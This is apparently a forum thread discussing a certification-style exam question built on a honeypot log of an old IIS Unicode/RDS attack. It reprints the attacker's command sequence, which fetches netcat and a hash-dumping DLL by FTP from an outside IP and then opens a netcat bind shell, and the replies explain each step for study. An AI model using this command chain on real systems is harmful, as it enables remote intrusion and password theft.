The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a
malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp s:ftpcom”
“cmd1.exe /c nc l p 6969 e-cmd1.exe”
What can you infer from the exploit given?
A.
It is a local exploit where the attacker logs in using username johna2k.
B.
There are two attackers on the system – johna2k and haxedj00.
C.
The attack is a remote exploit and the hacker downloads three files.
D.
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
can someone explain this to me? Thanks 🙂
I just came upon this question today, and it’s pissing me off because it’s a little not right.
Premise:
The exploit works as said, commands are proxied to the command prompt system via unicode exploits (code red or Nimda likely). Through this you build an ftp script, upload exploit files and offer yourself up a command prompt for better command controls.
FTP SCRIPTS:
Ftp can be manually run and you type everything, or by automated jobs run from command prompt with a script you configure “ftp s:{script you made}” http://www.computerhope.com/issues/ch001249.htm. You build your script to execute commands to mimic the info like in that link. Even in a hack with a limited interactive shell, you can’t open up notepad.exe there to build your ftp script, you’re in a shell only you don’t have desktops and apps popping up! Even worse, here you’re just throwing queries hoping they execute on the server, through this exploit. You have to hope you typed things right, and you have rights to run what you run- in this exploit you do.
So “echo” will put the commands into the script file (ftpcom) and build it on the exploited machine (which is Windows here because it’s assuming cmd.exe as the command prompt- take notice it’s “cmd1.exe” running here, not cmd.exe the real Windows command prompt.
The first “greater than sign” alone means to create a new file called “ftpcom”, then lines with 2 greater than signs means to APPEND to the existing ftpcom file but doing line feed and carriage return for 1 line each. You put extra 1 space after each entry(but before the double greater than signs) because of that initial other interactive prompt of an ftp shell asking for input on your download ftp server. Failure to put that space after credentials (example: johna2k (1 space) >>ftpcom) will fail login (at least) for many FTP systems, from interactive shell calling with scripts.
that ftp script itself does the following:
1) connect to rogue ftp server with IP address of 213.116.251.162
2) enter ftp username of johna2k
3) enter ftp password of haxedj00
4) download nc.exe (netcat for backdoor opening)
5) download samdump.dll (DLL injection file to print off hashes of password later in your attack- missing 2 other needed files though pwdump2.exe and lsass.exe)
6) close the ftp session
Ok, now that would only FTP’d in “2” files to the target, not 3: nc.exe and samdump.dll. What 3rd file?
Back to the example, “cmd1.exe /c ftp s:ftpcom” means just like you typed it yourself, you tell your fake CMD1.EXE command shell to run your ftp script and perform all the actions described above, on your behalf, to bring in your two files so you can make the machine run them.
Then “cmd1.exe /c nc l p 6969 e-cmd1.exe” not right but whatever means to tell your special command prompt to open up a NEW AND COMPLETELY SEPARATE PROCESS of CMD1.EXE and listen for connection on port 6969 (with the netcat that you just ftp downloaded with the script) and execute a bind shell (waiting full command prompt) through that command prompt, to anyone who connects on port 6969 (remotely assumed here).
Not listed: Next step you get a windows command prompt when you connect to that netcat backdoor on port 6969 (using netcat remotely to access that waiting shell).
Knowledge Needed: ftp scripts + early unicode exploits + netcat options.
Deciphering:
honeypot = external entry + NIMDA or CODE RED RDS/MDAC exploits = remote exploit- (A is eliminated)
hackedj00 is the password entry in the file- (B is eliminated)
netcat command did not have “-u” option so it did not use UDP (D is eliminated)
… but “C”? What 3 files?
I guess it’s assumed you first downloaded CMD”1″.EXE since that’s not a natural file on Windows, you must have uploaded your own command prompt earlier. It also doesn’t make sense you’d bring only samdump.dll and not the other 2 files in the pwdump package to grab the hashes. You can’t do anything with the file alone.
Normally, Pwdump#.exe tells your uploaded fake version of lsass.exe to inject the samdump.dll file, and if you have elevated rights, you can grab the Windows password hashes. That’s back in the days. Nowadays there is an exe with everything bundled or remotely grab it.
Either way you cut it, I showed you how to eliminate the other answers.
btw there are “minus” signs in front of those commands but I was unsure if they were stripped by commenting system here. “-s” for the ftp and netcat options.
Using the exploit, the payload commands perform as such:
Populate file ‘ftpcom’ with ftp commands
1) open connection to server
2) supply username
3) supply password
4) retrieve nc.exe file
5) retrieve samdump.dll file
6) close ftp session
—————————————-
cmd1.exe /c open 213.116.251.162 >ftpcom
cmd1.exe /c echo johna2k >>ftpcom
cmd1.exe /c echo haxedj00 >>ftpcom
cmd1.exe /c echo get nc.exe >>ftpcom
cmd1.exe /c echo get samdump.dll >>ftpcom
cmd1.exe /c echo quit >>ftpcom
Run ftp commands specified in file ‘ftpcom’
——————————————–
cmd1.exe /c ftp s:ftpcom
Run nc.exe that was just downloaded from hacker’s ftp server
Listen on port 6969 and when connections are made run cmd1.exe (give command prompt)
———————————————–
cmd1.exe /c nc l p 6969 e-cmd1.exe